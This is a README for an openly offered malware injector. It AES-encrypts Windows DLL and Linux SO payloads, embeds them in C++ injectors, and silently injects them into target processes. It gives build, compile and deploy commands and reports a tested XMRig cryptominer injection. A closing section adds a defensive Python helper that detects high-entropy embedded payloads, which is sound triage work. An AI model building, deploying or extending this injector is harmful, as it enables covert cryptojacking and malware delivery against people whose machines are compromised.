# AES-Encrypted Cross-Platform Payload Injector

Secure AES-CBC encrypted malware injection for Windows (DLL) and Linux (SO) with embedded payloads.

## 🚀 Quick Start (Automated)

```bash
# Place your malware files in the root directory:
# - libphotoshop.dll (Windows DLL)
# - libphotoshop.so (Linux SO)

# Run the automated build script:
./build_injectors.sh

# This will:
# ✅ Encrypt both DLL and SO files
# ✅ Generate embedded hex data
# ✅ Build Linux injector
# ✅ Prepare Windows injector for compilation
```

## 📦 Manual Build (If Needed)

### Linux Build

```bash
g++ -std=c++11 linux_injector.cpp -o linux_injector -lssl -lcrypto -ldl
./linux_injector  # Test injection
```

### Windows Build

```bash
# On Windows with Visual Studio:
cl.exe /EHsc windows_injector.cpp advapi32.lib

# Or with MinGW:
g++ -std=c++11 windows_injector.cpp -o windows_injector.exe -ladvapi32
windows_injector.exe  # Test injection
```

## 🔧 How It Works

### 1. Encrypt Payloads

```bash
cd crypt
cargo run ../libphotoshop.dll  # Creates encrypted files
```

### 2. Embed in Injectors

The build script automatically:

- Converts binaries to hex arrays
- Embeds encrypted data in C++ source
- Generates platform-specific injectors

### 3. Runtime Execution

- **Decrypts** AES-128-CBC encrypted payload
- **Injects** DLL/SO into target process
- **Executes** malware functions (`test_start`)

## 🔒 Security Features

- **AES-128-CBC** encryption with random IVs
- **SHA256 key derivation** (password + salt)
- **PKCS7 padding** with validation
- **No embedded keys** (derived at runtime)
- **Cross-platform isolation** (no code leakage)

## 📋 Architecture

```
├── crypt/                 # Rust AES encryption tool
├── linux_injector         # Linux SO injector (compiled)
├── windows_injector.cpp   # Windows DLL injector (source)
├── build_injectors.sh     # Automated build script
└── libphotoshop.*         # Encrypted malware payloads
```

## ✅ Verification

**Linux:** ✅ **TESTED** - Real XMRig SO injection confirmed (700%+ CPU usage)

**Windows:** ✅ **READY** - Source prepared with real encrypted DLL payload

## 🎯 Usage

```bash
# Automated build (recommended)
./build_injectors.sh

# Deploy Linux
./linux_injector

# Deploy Windows (after compilation)
windows_injector.exe
```

Both injectors decrypt embedded payloads and inject them into target processes silently.
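
From a detection standpoint, the design described above (an AES-CBC-encrypted binary embedded as a byte array in the injector) leaves a large, contiguous high-entropy region in the compiled file. The following is an added example, not part of this repository: a Python triage helper that flags such regions with windowed Shannon entropy. The window size, threshold, minimum run length and the sample input are assumptions chosen for illustration.

```python
import hashlib
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def high_entropy_runs(blob: bytes, window=4096, threshold=7.5, min_run=16384):
    """Return (offset, length) for runs of consecutive high-entropy windows.

    Only full windows are scored; a trailing partial window is ignored
    because short samples cannot reach a meaningful entropy value.
    """
    runs, start = [], None
    for off in range(0, len(blob) - window + 1, window):
        hot = shannon_entropy(blob[off:off + window]) >= threshold
        if hot and start is None:
            start = off                      # a run begins
        elif not hot and start is not None:
            runs.append((start, off - start))  # a run ends
            start = None
    if start is not None:                    # run reaches the last full window
        end = (len(blob) // window) * window
        runs.append((start, end - start))
    return [(o, n) for o, n in runs if n >= min_run]

def constructed_sample() -> bytes:
    """Constructed test input: code-like filler around a pseudo-random blob
    standing in for an embedded ciphertext (no real payload involved)."""
    filler = (b"push rbp; mov rbp, rsp; call helper; ret\n" * 256)[:8192]
    stream = b"".join(hashlib.sha256(i.to_bytes(4, "big")).digest()
                      for i in range(2048))  # 65536 pseudo-random bytes
    return filler + stream + filler

if __name__ == "__main__":
    for offset, length in high_entropy_runs(constructed_sample()):
        print(f"high-entropy region at 0x{offset:x}, {length} bytes")
```

Compressed resources and packed sections also score high, so a hit is a lead for further analysis (for example, correlating with crypto library and dynamic-loading imports), not a verdict on its own.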